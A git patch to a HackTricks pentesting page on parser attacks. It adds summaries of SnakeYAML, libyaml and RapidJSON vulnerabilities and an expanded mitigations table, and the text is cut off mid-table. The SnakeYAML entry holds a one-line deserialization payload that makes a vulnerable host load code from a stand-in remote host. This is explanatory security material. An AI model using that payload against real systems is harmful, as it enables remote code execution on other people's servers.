From ebd4800ae182ef35b40f796b19bb0e5f644494d5 Mon Sep 17 00:00:00 2001 From: HackTricks News Bot Date: Fri, 1 Aug 2025 01:53:55 +0000 Subject: [PATCH] Add content from: Research Update: Enhanced src/pentesting-web/json-xml-yaml-h... --- src/pentesting-web/json-xml-yaml-hacking.md | 53 +++++++++++++++++---- 1 file changed, 45 insertions(+), 8 deletions(-) diff --git a/src/pentesting-web/json-xml-yaml-hacking.md b/src/pentesting-web/json-xml-yaml-hacking.md index 7b268093e..f601f2b62 100644 --- a/src/pentesting-web/json-xml-yaml-hacking.md +++ b/src/pentesting-web/json-xml-yaml-hacking.md @@ -128,16 +128,53 @@ Result: - **YAML** parser: `Action_1` (case-sensitive) - **XML** parser: parses `"Action_3"` inside the string +--- -### 🔐 Mitigations +## Notable Parser Vulnerabilities (2023-2025) -| Risk | Fix | -|-----------------------------|---------------------------------------| -| Unknown fields | `decoder.DisallowUnknownFields()` | -| Duplicate fields (JSON) | ❌ No fix in stdlib | -| Case-insensitive match | ❌ No fix in stdlib | -| XML garbage data | ❌ No fix in stdlib | -| YAML: unknown keys | `yaml.KnownFields(true)` | +> The following publicly-exploitable issues show that insecure parsing is a multi-language problem — not just a Go problem. +### SnakeYAML Deserialization RCE (CVE-2022-1471) + +* Affects: `org.yaml:snakeyaml` < **2.0** (used by Spring-Boot, Jenkins, etc.). +* Root cause: `new Constructor()` deserializes **arbitrary Java classes**, allowing gadget chains that culminate in remote-code execution. +* One-liner PoC (will open the calculator on vulnerable host): +```yaml +!!javax.script.ScriptEngineManager [ !!java.net.URLClassLoader [[ !!java.net.URL ["http://evil/"] ] ] ] +``` +* Fix / Mitigation: + 1. **Upgrade to ≥2.0** (uses `SafeLoader` by default). + 2. On older versions, explicitly use `new Yaml(new SafeConstructor())`. + +### libyaml Double-Free (CVE-2024-35325) + +* Affects: `libyaml` ≤0.2.5 (C library leveraged by many language bindings). +* Issue: Calling `yaml_event_delete()` twice leads to a double-free that attackers can turn into DoS or, in some scenarios, heap exploitation. +* Status: Upstream rejected as “API misuse”, but Linux distributions shipped patched **0.2.6** that null-frees the pointer defensively. + +### RapidJSON Integer (Under|Over)-flow (CVE-2024-38517 / CVE-2024-39684) + +* Affects: Tencent **RapidJSON** before commit `8269bc2` (<1.1.0-patch-22). +* Bug: In `GenericReader::ParseNumber()` unchecked arithmetic lets attackers craft huge numeric literals that wrap around and corrupt the heap — ultimately enabling privilege-escalation when the resulting object graph is used for authorization decisions. + +--- + +### 🔐 Mitigations (Updated) + +| Risk | Fix / Recommendation | +|-------------------------------------|------------------------------------------------------------| +| Unknown fields (JSON) | `decoder.DisallowUnknownFields()` | +| Duplicate fields (JSON) | ❌ No fix in stdlib — validate with [`jsoncheck`](https://github.com/dvsekhvalnov/johnny-five) | +| Case-insensitive match (Go) | ❌ No fix — validate struct tags + pre-canonicalize input | +| XML garbage data / XXE | Use a hardened parser (`encoding/xml` + `DisallowDTD`) | +| YAML unknown keys | `yaml.KnownFields(true)` | +| **Unsafe YAML deserialization** | Use SafeConstructor / upgrade to SnakeYAML ≥2.0 | +| libyaml ≤0.2.5 double-free | Upgrade to **0.2.6** or distro-patched release | +| RapidJSON